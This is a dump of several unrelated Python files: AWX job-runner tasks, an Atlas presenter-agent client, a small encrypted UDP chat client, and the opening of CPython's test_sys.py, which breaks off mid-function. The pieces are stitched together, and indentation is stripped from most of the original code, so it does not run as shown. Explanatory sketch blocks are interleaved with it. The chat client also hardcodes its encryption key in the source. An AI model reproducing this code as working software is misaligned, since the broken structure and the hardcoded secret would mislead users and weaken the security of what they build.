@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System job extra_vars can be blank; if not blank, it must be valid JSON
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it in a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
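# Hedged sketch (illustrative, no Django required): the copy_mapping idea used
# above with plain objects -- references into the copied set are remapped to
# the fresh copies; anything outside the mapping is carried over unchanged.
def _remap_reference(copy_mapping, related_obj):
    # Mirrors copy_mapping.get(related_obj, related_obj) above.
    return copy_mapping.get(related_obj, related_obj)

# old_child, new_child, unrelated = object(), object(), object()
# _remap_reference({old_child: new_child}, old_child) is new_child   -> True
# _remap_reference({old_child: new_child}, unrelated) is unrelated   -> True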
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair: the left side will be used for writing our payload
# (private data dir, kwargs); the right side will be passed to Receptor
# for reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
# Join the transmitter before checking for errors; checking exc while the
# thread may still be running would race with it.
transmitter_thread.join()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# which exits if the job has finished normally. The context manager ensures we do not
# leave any threads lying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occurred at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
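# Hedged sketch (not part of AWX): the "first completed future wins" pattern
# from _run_internal above, reduced to a self-contained example. One future
# does the work; the other watches it and could report a cancel instead.
def _first_completed_demo():
    import concurrent.futures
    import time

    def work():
        time.sleep(0.05)
        return 'processed'

    def watch(other):
        # Poll the sibling future, as cancel_watcher does above.
        while not other.done():
            time.sleep(0.01)
        return 'watched'

    with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
        work_future = executor.submit(work)
        watch_future = executor.submit(watch, work_future)
        done = concurrent.futures.wait(
            [work_future, watch_future],
            return_when=concurrent.futures.FIRST_COMPLETED,
        )
        # Whichever future finished first carries the result we act on.
        return list(done.done)[0].result()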
# Spawned in a thread so Receptor can start reading before we finish writing;
# we write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# The socket must be shut down here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
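# Hedged sketch (not part of AWX): why the shutdown(SHUT_WR) above matters.
# With a socketpair, the reader only sees EOF once the writer half-closes;
# without it, the read() below would block forever.
def _socketpair_eof_demo():
    import socket
    import threading

    left, right = socket.socketpair()

    def write_side():
        try:
            left.sendall(b'payload')
        finally:
            left.shutdown(socket.SHUT_WR)  # signal EOF to the reader

    t = threading.Thread(target=write_side)
    t.start()
    data = right.makefile('rb').read()  # returns once EOF is seen
    t.join()
    left.close()
    right.close()
    return data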
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task and self.task.instance.execution_environment:
ee = self.task.instance.execution_environment
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
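# Hedged note (illustrative values): the {**default_pod_spec, **pod_spec_override}
# spread above is a shallow merge -- a top-level key in the override replaces
# that whole subtree rather than merging nested dicts key by key, e.g.
#   {**{'metadata': {'a': 1}}, **{'metadata': {'b': 2}}} == {'metadata': {'b': 2}}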
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
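# Hedged note: certificate-authority-data in a kubeconfig holds the CA PEM
# base64-encoded, which is what the b64encode(...).decode() above produces;
# when verification is off, insecure-skip-tls-verify is set instead.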
|
presenter_agent.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import time
from threading import Thread
import sys
from atlas_utils.acl_logger import log_error, log_info
from atlas_utils.presenteragent.socket_client import AgentSocket
import atlas_utils.presenteragent.presenter_message as pm
import atlas_utils.presenteragent.presenter_datatype as datatype
class PresenterAgent(object):
"""Message proxy to presenter server"""
def __init__(self, server_ip, port):
self.socket = AgentSocket(server_ip, port)
self._closed = False
self.heart_beat_thread = None
def connect_server(self):
"""Connect presenter server"""
return self.socket.connect()
def start_heard_beat_thread(self):
"""Start thread that send heardbeat messages"""
self.heart_beat_thread = Thread(target=self._keep_alive)
self.heart_beat_thread.start()
def _keep_alive(self):
msg = pm.heartbeat_message()
while True:
if self._closed:
log_error("Heard beat thread exit")
break
self.socket.send_msg(msg)
time.sleep(2)
def exit(self):
"""Proxy exit"""
# Set the closed flag first so the heartbeat loop stops before the socket goes away.
self._closed = True
self.socket.close()
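# Hedged sketch (not part of atlas_utils): the same keep-alive loop built on
# threading.Event. Event.wait(interval) doubles as an interruptible sleep, so
# stop() takes effect immediately instead of after the current time.sleep(2).
import threading

class _EventHeartbeat:
    def __init__(self, send, interval=2.0):
        self._send = send
        self._interval = interval
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._loop, daemon=True)

    def _loop(self):
        # wait() returns False on timeout (send a beat) and True once set (exit).
        while not self._stop.wait(self._interval):
            self._send()

    def start(self):
        self._thread.start()

    def stop(self):
        self._stop.set()
        self._thread.join()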
def StartPresenterAgent(
msg_queue,
server_ip,
port,
open_status,
data_respone_counter):
"""Startup presenter agent"""
agent = PresenterAgent(server_ip, port)
ret = agent.connect_server()
if ret:
log_error("Connect server failed, ret =", ret)
return
open_status.value = datatype.STATUS_CONNECTED
while True:
data = msg_queue.get()
if data is None:
continue
if isinstance(data, datatype.FinishMsg):
log_info("Receive presenter agent exit notification, queue size ",
msg_queue.qsize())
time.sleep(0.1)
agent.exit()
break
agent.socket.send_msg(data)
msg_name, msg_body = agent.socket.recv_msg()
if (msg_name is None) or (msg_body is None):
log_error("Recv invalid message, message name ", msg_name)
continue
if ((open_status.value == datatype.STATUS_CONNECTED) and
pm.is_open_channel_response(msg_name)):
log_info("Received open channel respone")
open_status.value = datatype.STATUS_OPENED
agent.start_heard_beat_thread()
log_info(
"presenter agent change connect_status to ",
open_status.value)
if ((open_status.value == datatype.STATUS_OPENED) and
pm.is_image_frame_response(msg_name)):
data_respone_counter.value += 1
#log_info("send ok ", data_respone_counter.value)
|
ClientSide.py | # EXECUTAR COM PYCHARM PARA VER OS NOMES COLORIDOS
import socket
import threading
from time import sleep
from random import randint
from cryptography.fernet import Fernet
# CMD Command: pip install cryptography
# Linux Terminal/MACOS: pip3 install cryptography
def crypto_tolls():
key = b'n05rzNJNF-tU4H-oCneuEdDxR4_fCL_wAgsy9CmB7Jk='
fernet = Fernet(key)
return fernet
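# Hedged sketch: what the Fernet object returned above does. encrypt() yields
# a bytes token; decrypt() restores the plaintext and raises
# cryptography.fernet.InvalidToken for a wrong key or tampered token.
def _fernet_roundtrip_demo():
    fernet = crypto_tolls()
    token = fernet.encrypt('olá'.encode('utf-8'))
    return fernet.decrypt(token).decode('utf-8')  # -> 'olá'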
def getIP():
hostname = socket.gethostname()
ip_address = socket.gethostbyname(hostname) # IPv4
return ip_address
def format(msg):
return name + msg
def reciveMsg():
global kill_bool
while True:
msgBytes, serverIP = client.recvfrom(BUFFSIZE)
decryptedmsg = crypto.decrypt(msgBytes).decode(character)
print(decryptedmsg)
if kill_bool:
break
def clientSide(address):
global cont, kill_var, kill_bool, name
while True:
if cont == 0:
name = input("Name: ")
name = f'\033[1;3{randint(1, 6)}m{name}: \033[m'
msg = f'\033[1;36m>>JOINED \033[m'
token = '0'
else:
sleep(0.0001)  # Synchronize
msg = input()
token = '1'
if msg == kill_var:
msg = f'\033[1;31m>>USER DISCONNECTED \033[m'
kill_bool = True
token = '2'
decryptedmsg = format(msg)
encryptedmsg = crypto.encrypt(decryptedmsg.encode(character))  # Encrypted message
msgsend = encryptedmsg + token.encode(character)
client.sendto(msgsend, address)
cont += 1
if kill_bool:
break
name = ''
cont = 0
kill_var = '/exit'  # Shutdown command
kill_bool = False
BUFFSIZE = 16384 # = 2^14
HOST = getIP() # IPv4
PORT = 12000  # Desired port
ADDR = (HOST, PORT)  # IP/port tuple
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
character = "utf-8"
crypto = crypto_tolls()  # Cryptography tools
ClientSideThread = threading.Thread(target=clientSide, args=(ADDR,))
ClientReciveThread = threading.Thread(target=reciveMsg)
ClientSideThread.start()
while True:
if cont != 0:
ClientReciveThread.start()
break
ClientSideThread.join()
|
test_sys.py | from test import support
from test.support.script_helper import assert_python_ok, assert_python_failure
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
